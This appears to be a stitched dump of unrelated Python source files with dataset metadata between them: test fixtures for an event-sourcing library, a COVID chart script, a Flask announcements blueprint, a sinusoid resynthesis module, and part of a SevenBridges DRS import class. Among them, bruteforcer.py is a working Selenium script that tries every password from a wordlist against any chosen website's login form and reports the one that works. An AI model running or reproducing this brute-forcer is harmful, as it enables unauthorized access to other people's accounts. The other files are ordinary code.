event_repository=self.event_repository, transaction_repository=self.transaction_repository
)
self.container = containers.DynamicContainer()
self.container.broker_publisher = providers.Object(self.broker_publisher)
self.container.broker_pool = providers.Object(self.broker_pool)
self.container.transaction_repository = providers.Object(self.transaction_repository)
self.container.lock_pool = providers.Object(self.lock_pool)
self.container.event_repository = providers.Object(self.event_repository)
self.container.snapshot_repository = providers.Object(self.snapshot_repository)
self.container.wire(
modules=[sys.modules["minos.aggregate"], sys.modules["minos.networks"], sys.modules["minos.common"]]
)
async def asyncSetUp(self):
await super().asyncSetUp()
await self.broker_publisher.setup()
await self.transaction_repository.setup()
await self.lock_pool.setup()
await self.event_repository.setup()
await self.snapshot_repository.setup()
async def asyncTearDown(self):
await self.snapshot_repository.destroy()
await self.event_repository.destroy()
await self.lock_pool.destroy()
await self.transaction_repository.destroy()
await self.broker_publisher.destroy()
await super().asyncTearDown()
def tearDown(self) -> None:
self.container.unwire()
super().tearDown()
class TestRepositorySelect(unittest.IsolatedAsyncioTestCase):
def assert_equal_repository_entries(self: TestCase, expected: list[EventEntry], observed: list[EventEntry]) -> None:
"""For testing purposes."""
self.assertEqual(len(expected), len(observed))
for e, o in zip(expected, observed):
self.assertEqual(type(e), type(o))
self.assertEqual(e.aggregate_uuid, o.aggregate_uuid)
self.assertEqual(e.aggregate_name, o.aggregate_name)
self.assertEqual(e.version, o.version)
self.assertEqual(e.data, o.data)
self.assertEqual(e.id, o.id)
self.assertEqual(e.action, o.action)
self.assertAlmostEqual(e.created_at or current_datetime(), o.created_at, delta=timedelta(seconds=5))
class FakeBroker(MinosSetup):
"""For testing purposes."""
async def send(self, *args, **kwargs) -> None:
"""For testing purposes."""
async def get_one(self, *args, **kwargs):
"""For testing purposes."""
async def get_many(self, *args, **kwargs):
"""For testing purposes."""
class FakeAsyncIterator:
"""For testing purposes."""
def __init__(self, seq):
self.iter = iter(seq)
def __aiter__(self):
return self
async def __anext__(self):
try:
return next(self.iter)
except StopIteration:
raise StopAsyncIteration
class FakeLock(Lock):
"""For testing purposes."""
def __init__(self, key=None, *args, **kwargs):
if key is None:
key = "fake"
super().__init__(key, *args, **kwargs)
async def __aexit__(self, exc_type, exc_val, exc_tb):
return
class FakeLockPool(MinosPool):
"""For testing purposes."""
async def _create_instance(self):
return FakeLock()
async def _destroy_instance(self, instance) -> None:
"""For testing purposes."""
class FakeBrokerPool(MinosPool):
"""For testing purposes."""
async def _create_instance(self):
return FakeBroker()
async def _destroy_instance(self, instance) -> None:
"""For testing purposes."""
class Owner(Aggregate):
"""Aggregate ``Owner`` class for testing purposes."""
name: str
surname: str
age: Optional[int]
class Car(Aggregate):
"""Aggregate ``Car`` class for testing purposes."""
doors: int
color: str
owner: Optional[ModelRef[Owner]]
class Order(Aggregate):
"""For testing purposes"""
products: EntitySet[OrderItem]
reviews: ValueObjectSet[Review]
class OrderItem(Entity):
"""For testing purposes"""
amount: int
class Review(ValueObject):
"""For testing purposes."""
message: str
| from __future__ import (
annotations,
)
import sys
import unittest
from datetime import (
timedelta,
)
from pathlib import (
Path,
)
from typing import (
Optional,
)
from unittest import (
TestCase,
)
from dependency_injector import (
containers,
providers,
)
from minos.aggregate import (
Aggregate,
Entity,
EntitySet,
EventEntry,
InMemoryEventRepository,
InMemorySnapshotRepository,
InMemoryTransactionRepository,
ModelRef,
ValueObject,
ValueObjectSet,
)
from minos.common import (
Lock,
MinosPool,
MinosSetup,
current_datetime,
)
BASE_PATH = Path(__file__).parent
class MinosTestCase(unittest.IsolatedAsyncioTestCase):
def setUp(self) -> None:
super().setUp()
self.broker_publisher = FakeBroker()
self.broker_pool = FakeBrokerPool()
self.lock_pool = FakeLockPool()
self.transaction_repository = InMemoryTransactionRepository(lock_pool=self.lock_pool)
self.event_repository = InMemoryEventRepository(
broker_publisher=self.broker_publisher,
transaction_repository=self.transaction_repository,
lock_pool=self.lock_pool,
)
self.snapshot_repository = InMemorySnapshotRepository(
event_repository=self.event_repository, transaction_repository=self.transaction_repository
)
self.container = containers.DynamicContainer()
self.container.broker_publisher = providers.Object(self.broker_publisher)
self.container.broker_pool = providers.Object(self.broker_pool)
self.container.transaction_repository = providers.Object(self.transaction_repository)
self.container.lock_pool = providers.Object(self.lock_pool)
self.container.event_repository = providers.Object(self.event_repository)
self.container.snapshot_repository = providers.Object(self.snapshot_repository)
self.container.wire(
modules=[sys.modules["minos.aggregate"], sys.modules["minos.networks"], sys.modules["minos.common"]]
)
async def asyncSetUp(self):
await super().asyncSetUp()
await self.broker_publisher.setup()
await self.transaction_repository.setup()
await self.lock_pool.setup()
await self.event_repository.setup()
await self.snapshot_repository.setup()
async def asyncTearDown(self):
await self.snapshot_repository.destroy()
await self.event_repository.destroy()
await self.lock_pool.destroy()
await self.transaction_repository.destroy()
await self.broker_publisher.destroy()
await super().asyncTearDown()
def tearDown(self) -> None:
self.container.unwire()
super().tearDown()
class TestRepositorySelect(unittest.IsolatedAsyncioTestCase):
def assert_equal_repository_entries(self: TestCase, expected: list[EventEntry], observed: list[EventEntry]) -> None:
"""For testing purposes."""
self.assertEqual(len(expected), len(observed))
for e, o in zip(expected, observed):
self.assertEqual(type(e), type(o))
self.assertEqual(e.aggregate_uuid, o.aggregate_uuid)
self.assertEqual(e.aggregate_name, o.aggregate_name)
self.assertEqual(e.version, o.version)
self.assertEqual(e.data, o.data)
self.assertEqual(e.id, o.id)
self.assertEqual(e.action, o.action)
self.assertAlmostEqual(e.created_at or current_datetime(), o.created_at, delta=timedelta(seconds=5))
class FakeBroker(MinosSetup):
"""For testing purposes."""
async def send(self, *args, **kwargs) -> None:
"""For testing purposes."""
async def get_one(self, *args, **kwargs):
"""For testing purposes."""
async def get_many(self, *args, **kwargs):
"""For testing purposes."""
class FakeAsyncIterator:
"""For testing purposes."""
def __init__(self, seq):
self.iter = iter(seq)
def __aiter__(self):
return self
async def __anext__(self):
try:
return next(self.iter)
except StopIteration:
raise StopAsyncIteration
class FakeLock(Lock):
"""For testing purposes."""
def __init__(self, key=None, *args, **kwargs):
if key is None:
key = "fake"
super().__init__(key, *args, **kwargs)
async def __aexit__(self, exc_type, exc_val, exc_tb):
return
class FakeLockPool(MinosPool):
"""For testing purposes."""
async def _create_instance(self):
return FakeLock()
async def _destroy_instance(self, instance) -> None:
"""For testing purposes."""
class FakeBrokerPool(MinosPool):
"""For testing purposes."""
async def _create_instance(self):
return FakeBroker()
async def _destroy_instance(self, instance) -> None:
"""For testing purposes."""
class Owner(Aggregate):
"""Aggregate ``Owner`` class for testing purposes."""
name: str
surname: str
age: Optional[int]
class Car(Aggregate):
"""Aggregate ``Car`` class for testing purposes."""
doors: int
color: str
owner: Optional[ModelRef[Owner]]
class Order(Aggregate):
"""For testing purposes"""
products: EntitySet[OrderItem]
reviews: ValueObjectSet[Review]
class OrderItem(Entity):
"""For testing purposes"""
amount: int
class Review(ValueObject):
"""For testing purposes."""
message: str | en | 0.686641 | For testing purposes. For testing purposes. For testing purposes. For testing purposes. For testing purposes. For testing purposes. For testing purposes. For testing purposes. For testing purposes. For testing purposes. For testing purposes. Aggregate ``Owner`` class for testing purposes. Aggregate ``Car`` class for testing purposes. For testing purposes For testing purposes For testing purposes. | 1.958163 | 2 |
MyVisualizations/MyVisualization6.py | ClownMonster/Covid-19_Visualization_ML | 0 | 6612412 | '''
This is to Render the Graphs for Confirmed, Deaths and Recovered Cases for the Required
Country.
'''
from DataSupply import Supply
import plotly.express as px
class clownRenders:
def __init__(self):
countryName = input('Enter the Country : ')
db_ob = Supply(countryName)
if db_ob.empty:
print('Invalid Country Name')
return
else:
self.db_ob = db_ob
self.countryName = countryName
return
def forConfirmed(self):
fig = px.bar(self.db_ob, x='Date',
y='Confirmed', color='Confirmed',
barmode='group', height=600)
fig.update_layout(title_text = f'Visualization of Confirmed Cases in {self.countryName}')
fig.show()
return
def forDeath(self):
fig = px.bar(self.db_ob, x='Date',
y='Deaths', color='Deaths',
barmode='group', height=600)
fig.update_layout(title_text = f'Visualization of Death Cases in {self.countryName}')
fig.show()
return
def forRecovered(self):
fig = px.bar(self.db_ob, x='Date',
y='Recoverd', color='Recovered',
barmode='group', height=600)
fig.update_layout(title_text = f'Visualization of Recovered Cases in {self.countryName}')
fig.show()
return
if __name__ == "__main__":
counter = True
while(counter):
ob = clownRenders() #object reference Formed for a particular country
try:
choice = input('1.Confirmed Cases \n2.Death Cases \n3.Recovered Cases\n4.Quit\nEnter Your Choice : ')
if(choice == '1'):
ob.forConfirmed()
elif(choice == '2'):
ob.forDeath()
elif(choice == '3'):
ob.forRecovered()
elif(choice == '4'):
counter = False
else:
print('Invalid Choice')
except:
print('Invalid Choice')
| '''
This is to Render the Graphs for Confirmed, Deaths and Recovered Cases for the Required
Country.
'''
from DataSupply import Supply
import plotly.express as px
class clownRenders:
def __init__(self):
countryName = input('Enter the Country : ')
db_ob = Supply(countryName)
if db_ob.empty:
print('Invalid Country Name')
return
else:
self.db_ob = db_ob
self.countryName = countryName
return
def forConfirmed(self):
fig = px.bar(self.db_ob, x='Date',
y='Confirmed', color='Confirmed',
barmode='group', height=600)
fig.update_layout(title_text = f'Visualization of Confirmed Cases in {self.countryName}')
fig.show()
return
def forDeath(self):
fig = px.bar(self.db_ob, x='Date',
y='Deaths', color='Deaths',
barmode='group', height=600)
fig.update_layout(title_text = f'Visualization of Death Cases in {self.countryName}')
fig.show()
return
def forRecovered(self):
fig = px.bar(self.db_ob, x='Date',
y='Recoverd', color='Recovered',
barmode='group', height=600)
fig.update_layout(title_text = f'Visualization of Recovered Cases in {self.countryName}')
fig.show()
return
if __name__ == "__main__":
counter = True
while(counter):
ob = clownRenders() #object reference Formed for a particular country
try:
choice = input('1.Confirmed Cases \n2.Death Cases \n3.Recovered Cases\n4.Quit\nEnter Your Choice : ')
if(choice == '1'):
ob.forConfirmed()
elif(choice == '2'):
ob.forDeath()
elif(choice == '3'):
ob.forRecovered()
elif(choice == '4'):
counter = False
else:
print('Invalid Choice')
except:
print('Invalid Choice')
| en | 0.859748 | This is to Render the Graphs for Confirmed, Deaths and Recovered Cases for the Required Country. #object reference Formed for a particular country | 3.414258 | 3 |
bruteforcer.py | adnmaster2008/WyernWebsiteBruteForcer | 0 | 6612413 | <reponame>adnmaster2008/WyernWebsiteBruteForcer
import time
import os
import selenium
from selenium.webdriver import Chrome
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.keys import Keys
chromedriver_dir = "chromedriver.exe"
website_first_time_open_delay = 5
website_name = input("Enter website name: ")
login_selector = input("Enter login selector: ")
password_selector = input("Enter password selector: ")
while True:
password_list_name = input("Enter location of password_list: ")
if(os.path.exists(password_list_name)):
break
else:
print("Location doesn't exist")
password_list_file = open(password_list_name, "r")
password_list = password_list_file.read().splitlines()
password_list_file.close()
login_name = input("Enter username: ")
print("Starting...")
browser = Chrome(chromedriver_dir)
browser.get(website_name)
time.sleep(website_first_time_open_delay)
login_input_field = browser.find_element_by_css_selector(login_selector)
password_input_field = browser.find_element_by_css_selector(password_selector)
while True:
for x in range(1, len(password_list)):
login_input_field.send_keys(Keys.CONTROL + "a")
login_input_field.send_keys(Keys.DELETE)
password_input_field.send_keys(Keys.CONTROL + "a")
password_input_field.send_keys(Keys.DELETE)
login_input_field.send_keys(login_name)
password_input_field.send_keys(password_list[x])
password_input_field.submit()
print(password_list[x])
try:
if(True):
time.sleep(5)
WebDriverWait(browser, 1).until(EC.presence_of_element_located((By.CSS_SELECTOR, login_selector)))
WebDriverWait(browser, 1).until(EC.presence_of_element_located((By.CSS_SELECTOR, password_selector)))
else:
WebDriverWait(browser, 7).until(EC.presence_of_element_located((By.CSS_SELECTOR, login_selector)))
WebDriverWait(browser, 7).until(EC.presence_of_element_located((By.CSS_SELECTOR, password_selector)))
except:
print("Password found :)")
print("Password: "+password_list[x])
while True:
pass | import time
import os
import selenium
from selenium.webdriver import Chrome
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.keys import Keys
chromedriver_dir = "chromedriver.exe"
website_first_time_open_delay = 5
website_name = input("Enter website name: ")
login_selector = input("Enter login selector: ")
password_selector = input("Enter password selector: ")
while True:
password_list_name = input("Enter location of password_list: ")
if(os.path.exists(password_list_name)):
break
else:
print("Location doesn't exist")
password_list_file = open(password_list_name, "r")
password_list = password_list_file.read().splitlines()
password_list_file.close()
login_name = input("Enter username: ")
print("Starting...")
browser = Chrome(chromedriver_dir)
browser.get(website_name)
time.sleep(website_first_time_open_delay)
login_input_field = browser.find_element_by_css_selector(login_selector)
password_input_field = browser.find_element_by_css_selector(password_selector)
while True:
for x in range(1, len(password_list)):
login_input_field.send_keys(Keys.CONTROL + "a")
login_input_field.send_keys(Keys.DELETE)
password_input_field.send_keys(Keys.CONTROL + "a")
password_input_field.send_keys(Keys.DELETE)
login_input_field.send_keys(login_name)
password_input_field.send_keys(password_list[x])
password_input_field.submit()
print(password_list[x])
try:
if(True):
time.sleep(5)
WebDriverWait(browser, 1).until(EC.presence_of_element_located((By.CSS_SELECTOR, login_selector)))
WebDriverWait(browser, 1).until(EC.presence_of_element_located((By.CSS_SELECTOR, password_selector)))
else:
WebDriverWait(browser, 7).until(EC.presence_of_element_located((By.CSS_SELECTOR, login_selector)))
WebDriverWait(browser, 7).until(EC.presence_of_element_located((By.CSS_SELECTOR, password_selector)))
except:
print("Password found :)")
print("Password: "+password_list[x])
while True:
pass | none | 1 | 2.910427 | 3 | |
tests/selenium/guiops/pages/load_balancer/load_balancer_detail.py | gholms/eucaconsole | 0 | 6612414 | <filename>tests/selenium/guiops/pages/load_balancer/load_balancer_detail.py
from pages.detailpage import DetailPage
class ELBDetailPage(DetailPage):
def __init__(self, tester, load_balancer_name):
"""
Initiates ELB Detail page object.
:param load_balancer_name:
:param tester:
"""
self.load_balancer_name = load_balancer_name
self.tester = tester
| <filename>tests/selenium/guiops/pages/load_balancer/load_balancer_detail.py
from pages.detailpage import DetailPage
class ELBDetailPage(DetailPage):
def __init__(self, tester, load_balancer_name):
"""
Initiates ELB Detail page object.
:param load_balancer_name:
:param tester:
"""
self.load_balancer_name = load_balancer_name
self.tester = tester
| en | 0.695762 | Initiates ELB Detail page object. :param load_balancer_name: :param tester: | 2.02254 | 2 |
app_blue_points/webse/announcements/routes.py | mariobp-NHH/Sustainable_Energy_Web1_v2 | 0 | 6612415 | <filename>app_blue_points/webse/announcements/routes.py
import os
import secrets
import json
from datetime import timedelta, datetime
from PIL import Image
from flask import render_template, url_for, flash, redirect, request, abort, jsonify, Blueprint
from webse import app, db, bcrypt
from webse.announcements.forms import AnnouncementForm
from webse.models import User, Moduls, Announcement, Chat, Emissions
from flask_login import login_user, current_user, logout_user, login_required
announcements = Blueprint('announcements', __name__)
##################################
#### Block 2. Announcement ###
###################################
@announcements.route("/announcement/new", methods=['GET', 'POST'])
@login_required
def new_announcement():
form = AnnouncementForm()
if form.validate_on_submit():
announcement = Announcement(title=form.title.data, content=form.content.data, author=current_user)
db.session.add(announcement)
db.session.commit()
flash('Your announcement has been created!', 'success')
return redirect(url_for('home.home_main'))
return render_template('announcement/create_announcement.html', title='New Announcement',
form=form, legend='New Announcement')
@announcements.route("/announcement/<int:announcement_id>")
def announcement(announcement_id):
announcement = Announcement.query.get_or_404(announcement_id)
return render_template('announcement/announcement.html', title=announcement.title, announcement=announcement)
@announcements.route("/announcement/<int:announcement_id>/update", methods=['GET', 'POST'])
@login_required
def update_announcement(announcement_id):
announcement = Announcement.query.get_or_404(announcement_id)
if announcement.author != current_user:
abort(403)
form = AnnouncementForm()
if form.validate_on_submit():
announcement.title = form.title.data
announcement.content = form.content.data
db.session.commit()
flash('Your announcement has been updated!', 'success')
return redirect(url_for('announcements.announcement', announcement_id=announcement.id))
elif request.method == 'GET':
form.title.data = announcement.title
form.content.data = announcement.content
return render_template('announcement/create_announcement.html', title='Update Announcement',
form=form, legend='Update Announcement')
@announcements.route("/announcement/<int:announcement_id>/delete", methods=['GET', 'POST'])
@login_required
def delete_announcement(announcement_id):
announcement = Announcement.query.get_or_404(int(announcement_id))
if announcement.author != current_user:
abort(403)
db.session.delete(announcement)
db.session.commit()
flash('Your announcement has been deleted!', 'success')
return redirect(url_for('home.home_main'))
| <filename>app_blue_points/webse/announcements/routes.py
import os
import secrets
import json
from datetime import timedelta, datetime
from PIL import Image
from flask import render_template, url_for, flash, redirect, request, abort, jsonify, Blueprint
from webse import app, db, bcrypt
from webse.announcements.forms import AnnouncementForm
from webse.models import User, Moduls, Announcement, Chat, Emissions
from flask_login import login_user, current_user, logout_user, login_required
announcements = Blueprint('announcements', __name__)
##################################
#### Block 2. Announcement ###
###################################
@announcements.route("/announcement/new", methods=['GET', 'POST'])
@login_required
def new_announcement():
form = AnnouncementForm()
if form.validate_on_submit():
announcement = Announcement(title=form.title.data, content=form.content.data, author=current_user)
db.session.add(announcement)
db.session.commit()
flash('Your announcement has been created!', 'success')
return redirect(url_for('home.home_main'))
return render_template('announcement/create_announcement.html', title='New Announcement',
form=form, legend='New Announcement')
@announcements.route("/announcement/<int:announcement_id>")
def announcement(announcement_id):
announcement = Announcement.query.get_or_404(announcement_id)
return render_template('announcement/announcement.html', title=announcement.title, announcement=announcement)
@announcements.route("/announcement/<int:announcement_id>/update", methods=['GET', 'POST'])
@login_required
def update_announcement(announcement_id):
announcement = Announcement.query.get_or_404(announcement_id)
if announcement.author != current_user:
abort(403)
form = AnnouncementForm()
if form.validate_on_submit():
announcement.title = form.title.data
announcement.content = form.content.data
db.session.commit()
flash('Your announcement has been updated!', 'success')
return redirect(url_for('announcements.announcement', announcement_id=announcement.id))
elif request.method == 'GET':
form.title.data = announcement.title
form.content.data = announcement.content
return render_template('announcement/create_announcement.html', title='Update Announcement',
form=form, legend='Update Announcement')
@announcements.route("/announcement/<int:announcement_id>/delete", methods=['GET', 'POST'])
@login_required
def delete_announcement(announcement_id):
announcement = Announcement.query.get_or_404(int(announcement_id))
if announcement.author != current_user:
abort(403)
db.session.delete(announcement)
db.session.commit()
flash('Your announcement has been deleted!', 'success')
return redirect(url_for('home.home_main'))
| de | 0.858357 | ################################## #### Block 2. Announcement ### ################################### | 2.24714 | 2 |
ingester/fio/__init__.py | shapeshift-legacy/watchtower | 0 | 6612416 | from .fio_block_ingester import FioBlockIngester
fio_block_ingester = FioBlockIngester()
| from .fio_block_ingester import FioBlockIngester
fio_block_ingester = FioBlockIngester()
| none | 1 | 1.160814 | 1 | |
L06/synthtrax.py | dpwe/elene4896 | 19 | 6612417 | """Resynthesis of signals described as sinusoid tracks."""
import numpy as np
def synthtrax(F, M, SR, SUBF=128, DUR=0):
"""
% X = synthtrax(F, M, SR, SUBF, DUR) Reconstruct a sound from track rep'n.
% Each row of F and M contains a series of frequency and magnitude
% samples for a particular track. These will be remodulated and
% overlaid into the output sound X which will run at sample rate SR,
% although the columns in F and M are subsampled from that rate by
% a factor SUBF (default 128). If DUR is nonzero, X will be padded or
% truncated to correspond to just this much time.
% <EMAIL> 1994aug20, 1996aug22
"""
rows, cols = F.shape
opsamps = int(np.round(DUR * SR))
if not DUR:
opsamps = cols * SUBF
X = np.zeros(opsamps)
for row in xrange(rows):
mm = M[row]
ff = F[row]
# First, find onsets - points where mm goes from zero (or NaN) to nzero
# Before that, even, set all nan values of mm to zero
nzv = np.nonzero(mm)[0]
firstcol = np.min(nzv)
lastcol = np.max(nzv)
# for speed, chop off regions of initial and final zero magnitude -
# but want to include one zero from each end if they are there
zz = np.arange(np.maximum(0, firstcol-1), np.minimum(cols, lastcol+1))
nzcols = zz.shape[0]
if nzcols > 0:
mm = mm[zz]
ff = ff[zz]
mz = mm == 0
# Copy frequency values to one point past each end of nonzero stretches.
onsets = np.nonzero(np.logical_and(mz > 0, np.hstack(
[1, mz[:-1]]) == 0))[0]
ff[onsets - 1] = ff[onsets]
offsets = np.nonzero(np.logical_and(mz[:-1] > 0, mz[1:] == 0))[0]
ff[offsets + 1] = ff[offsets]
# Do interpolation.
ff = np.interp(np.arange(ff.shape[0] * SUBF)/float(SUBF),
np.arange(ff.shape[0]), ff)
mm = np.interp(np.arange(mm.shape[0] * SUBF)/float(SUBF),
np.arange(mm.shape[0]), mm)
# Convert frequency to phase values.
pp = np.cumsum(2*np.pi*ff/SR)
# Run the oscillator and apply the magnitude envelope.
xx = mm * np.cos(pp)
# Add it in to the correct place in the array.
X[SUBF * zz[0] + np.arange(xx.shape[0])] += xx
return X
def spearread(FN):
"""
% [F,M,T] = spearread(FN)
% Read in a sinusoidal analysis file written by Michael
% Klingbeil's SPEAR program, into Frequency and Magnitude
% matrices suitable for synthtrax.m. T is the actual time
% values for each column.
% 2010-02-14 <NAME> <EMAIL>
"""
# Files begin:
#par-text-frame-format
#point-type index frequency amplitude
#partials-count 32
#frame-count 549
#frame-data
#0.124943 1 0 430.064423 0.001209
#0.134943 1 0 429.900024 0.002103
#0.144943 5 0 430.215668 0.003097 4 855.366638 0.002075 3 1742.146851 0.002967 2 2165.423096 0.001978 1 2565.337402 0.001767
#0.154943 9 0 431.365143 0.004033 4 865.541565 0.003474 8 1298.919067 0.001814 3 1743.450806 0.00
# Each line is: time nharmonics indx0 freq0 amp0 indx1 freq1 amp1 ...
# indx values serve to connect tracks between frames.
with open(FN, "r") as f:
s = f.next().strip()
if s != 'par-text-frame-format':
raise ValueError(FN + ' does not look like SPEAR harmonics file')
s = f.next().strip()
if s != 'point-type index frequency amplitude':
raise ValueError('Did not see point-type ... in ' + FN)
s = f.next().strip()
if s.split(' ')[0] != 'partials-count':
raise ValueError('Missing partials-count in ' + FN)
partials_count = int(s.split(' ')[1])
s = f.next().strip()
if s.split(' ')[0] != 'frame-count':
raise ValueError('Missing frame-count in ' + FN)
frame_count = int(s.split(' ')[1])
s = f.next().strip()
if s != 'frame-data':
raise ValueError('Missing frame-data in ' + FN)
T = np.zeros(frame_count)
F = np.zeros((partials_count, frame_count))
M = np.zeros((partials_count, frame_count))
frame = 0
for s in f:
vals = [float(v) for v in s.split(' ')]
T[frame] = vals[0]
partials_this_frame = int(vals[1])
field_index = 2
for _ in xrange(partials_this_frame):
partial_index = int(vals[field_index])
F[partial_index, frame] = vals[field_index + 1]
M[partial_index, frame] = vals[field_index + 2]
field_index += 3
frame += 1
return F, M, T
| """Resynthesis of signals described as sinusoid tracks."""
import numpy as np
def synthtrax(F, M, SR, SUBF=128, DUR=0):
"""
% X = synthtrax(F, M, SR, SUBF, DUR) Reconstruct a sound from track rep'n.
% Each row of F and M contains a series of frequency and magnitude
% samples for a particular track. These will be remodulated and
% overlaid into the output sound X which will run at sample rate SR,
% although the columns in F and M are subsampled from that rate by
% a factor SUBF (default 128). If DUR is nonzero, X will be padded or
% truncated to correspond to just this much time.
% <EMAIL> 1994aug20, 1996aug22
"""
rows, cols = F.shape
opsamps = int(np.round(DUR * SR))
if not DUR:
opsamps = cols * SUBF
X = np.zeros(opsamps)
for row in xrange(rows):
mm = M[row]
ff = F[row]
# First, find onsets - points where mm goes from zero (or NaN) to nzero
# Before that, even, set all nan values of mm to zero
nzv = np.nonzero(mm)[0]
firstcol = np.min(nzv)
lastcol = np.max(nzv)
# for speed, chop off regions of initial and final zero magnitude -
# but want to include one zero from each end if they are there
zz = np.arange(np.maximum(0, firstcol-1), np.minimum(cols, lastcol+1))
nzcols = zz.shape[0]
if nzcols > 0:
mm = mm[zz]
ff = ff[zz]
mz = mm == 0
# Copy frequency values to one point past each end of nonzero stretches.
onsets = np.nonzero(np.logical_and(mz > 0, np.hstack(
[1, mz[:-1]]) == 0))[0]
ff[onsets - 1] = ff[onsets]
offsets = np.nonzero(np.logical_and(mz[:-1] > 0, mz[1:] == 0))[0]
ff[offsets + 1] = ff[offsets]
# Do interpolation.
ff = np.interp(np.arange(ff.shape[0] * SUBF)/float(SUBF),
np.arange(ff.shape[0]), ff)
mm = np.interp(np.arange(mm.shape[0] * SUBF)/float(SUBF),
np.arange(mm.shape[0]), mm)
# Convert frequency to phase values.
pp = np.cumsum(2*np.pi*ff/SR)
# Run the oscillator and apply the magnitude envelope.
xx = mm * np.cos(pp)
# Add it in to the correct place in the array.
X[SUBF * zz[0] + np.arange(xx.shape[0])] += xx
return X
def spearread(FN):
"""
% [F,M,T] = spearread(FN)
% Read in a sinusoidal analysis file written by Michael
% Klingbeil's SPEAR program, into Frequency and Magnitude
% matrices suitable for synthtrax.m. T is the actual time
% values for each column.
% 2010-02-14 <NAME> <EMAIL>
"""
# Files begin:
#par-text-frame-format
#point-type index frequency amplitude
#partials-count 32
#frame-count 549
#frame-data
#0.124943 1 0 430.064423 0.001209
#0.134943 1 0 429.900024 0.002103
#0.144943 5 0 430.215668 0.003097 4 855.366638 0.002075 3 1742.146851 0.002967 2 2165.423096 0.001978 1 2565.337402 0.001767
#0.154943 9 0 431.365143 0.004033 4 865.541565 0.003474 8 1298.919067 0.001814 3 1743.450806 0.00
# Each line is: time nharmonics indx0 freq0 amp0 indx1 freq1 amp1 ...
# indx values serve to connect tracks between frames.
with open(FN, "r") as f:
s = f.next().strip()
if s != 'par-text-frame-format':
raise ValueError(FN + ' does not look like SPEAR harmonics file')
s = f.next().strip()
if s != 'point-type index frequency amplitude':
raise ValueError('Did not see point-type ... in ' + FN)
s = f.next().strip()
if s.split(' ')[0] != 'partials-count':
raise ValueError('Missing partials-count in ' + FN)
partials_count = int(s.split(' ')[1])
s = f.next().strip()
if s.split(' ')[0] != 'frame-count':
raise ValueError('Missing frame-count in ' + FN)
frame_count = int(s.split(' ')[1])
s = f.next().strip()
if s != 'frame-data':
raise ValueError('Missing frame-data in ' + FN)
T = np.zeros(frame_count)
F = np.zeros((partials_count, frame_count))
M = np.zeros((partials_count, frame_count))
frame = 0
for s in f:
vals = [float(v) for v in s.split(' ')]
T[frame] = vals[0]
partials_this_frame = int(vals[1])
field_index = 2
for _ in xrange(partials_this_frame):
partial_index = int(vals[field_index])
F[partial_index, frame] = vals[field_index + 1]
M[partial_index, frame] = vals[field_index + 2]
field_index += 3
frame += 1
return F, M, T
| en | 0.753584 | Resynthesis of signals described as sinusoid tracks. % X = synthtrax(F, M, SR, SUBF, DUR) Reconstruct a sound from track rep'n. % Each row of F and M contains a series of frequency and magnitude % samples for a particular track. These will be remodulated and % overlaid into the output sound X which will run at sample rate SR, % although the columns in F and M are subsampled from that rate by % a factor SUBF (default 128). If DUR is nonzero, X will be padded or % truncated to correspond to just this much time. % <EMAIL> 1994aug20, 1996aug22 # First, find onsets - points where mm goes from zero (or NaN) to nzero # Before that, even, set all nan values of mm to zero # for speed, chop off regions of initial and final zero magnitude - # but want to include one zero from each end if they are there # Copy frequency values to one point past each end of nonzero stretches. # Do interpolation. # Convert frequency to phase values. # Run the oscillator and apply the magnitude envelope. # Add it in to the correct place in the array. % [F,M,T] = spearread(FN) % Read in a sinusoidal analysis file written by Michael % Klingbeil's SPEAR program, into Frequency and Magnitude % matrices suitable for synthtrax.m. T is the actual time % values for each column. % 2010-02-14 <NAME> <EMAIL> # Files begin: #par-text-frame-format #point-type index frequency amplitude #partials-count 32 #frame-count 549 #frame-data #0.124943 1 0 430.064423 0.001209 #0.134943 1 0 429.900024 0.002103 #0.144943 5 0 430.215668 0.003097 4 855.366638 0.002075 3 1742.146851 0.002967 2 2165.423096 0.001978 1 2565.337402 0.001767 #0.154943 9 0 431.365143 0.004033 4 865.541565 0.003474 8 1298.919067 0.001814 3 1743.450806 0.00 # Each line is: time nharmonics indx0 freq0 amp0 indx1 freq1 amp1 ... # indx values serve to connect tracks between frames. | 2.895473 | 3 |
sevenbridges/models/drs_import.py | sbg/sevenbridges-python | 46 | 6612418 | <reponame>sbg/sevenbridges-python<filename>sevenbridges/models/drs_import.py
import logging
from sevenbridges.errors import SbgError
from sevenbridges.meta.fields import (
HrefField, StringField, DateTimeField, CompoundListField
)
from sevenbridges.meta.resource import Resource
from sevenbridges.meta.transformer import Transform
from sevenbridges.models.compound.import_result import FileImportResult
from sevenbridges.models.file import File
logger = logging.getLogger(__name__)
class DRSImportBulk(Resource):
"""
Central resource for managing DRS imports.
"""
_URL = {
'get': '/bulk/drs/imports/{id}',
'create': '/bulk/drs/imports/create',
}
id = StringField(read_only=True)
href = HrefField(read_only=True)
result = CompoundListField(FileImportResult, read_only=True)
_result_files = [] # cache for result_files property
state = StringField(read_only=True)
started_on = DateTimeField(read_only=True)
finished_on = DateTimeField(read_only=True)
def __str__(self):
return f'<DRSBulkImport: id={self.id}>'
def __eq__(self, other):
if type(other) is not type(self):
return False
return self is other or self.id == other.id
@property
def result_files(self):
"""
Retrieve files that were successfully imported.
:return: List of File objects
"""
try:
cached_file_ids = set([
file.resource.id for file in self._result_files
])
imported_file_ids = set([
file.resource.id
for file in self.result if file.resource
])
file_ids_to_retrieve = imported_file_ids - cached_file_ids
if file_ids_to_retrieve:
files = File.bulk_get(
files=file_ids_to_retrieve, api=self._api
)
self._result_files.extend(files)
return self._result_files if self._result_files else None
except TypeError:
return None
@classmethod
def bulk_get(cls, import_job_id, api=None):
"""
Retrieve DRS bulk import details
:param import_job_id: Import id to be retrieved.
:param api: Api instance.
:return: DRSImportBulk object.
"""
api = api or cls._API
if not import_job_id:
raise SbgError('DRS import is required!')
elif not isinstance(import_job_id, str):
raise SbgError('Invalid DRS import parameter!')
response = api.get(
url=cls._URL['get'].format(id=import_job_id)
).json()
return DRSImportBulk(api=api, **response)
@classmethod
def bulk_submit(
cls, imports, tags=None, conflict_resolution='SKIP', api=None
):
"""
Submit DRS bulk import
:param imports: List of dicts describing a wanted import.
:param tags: list of tags to be applied.
:param conflict_resolution: Type of file naming conflict resolution.
:param api: Api instance.
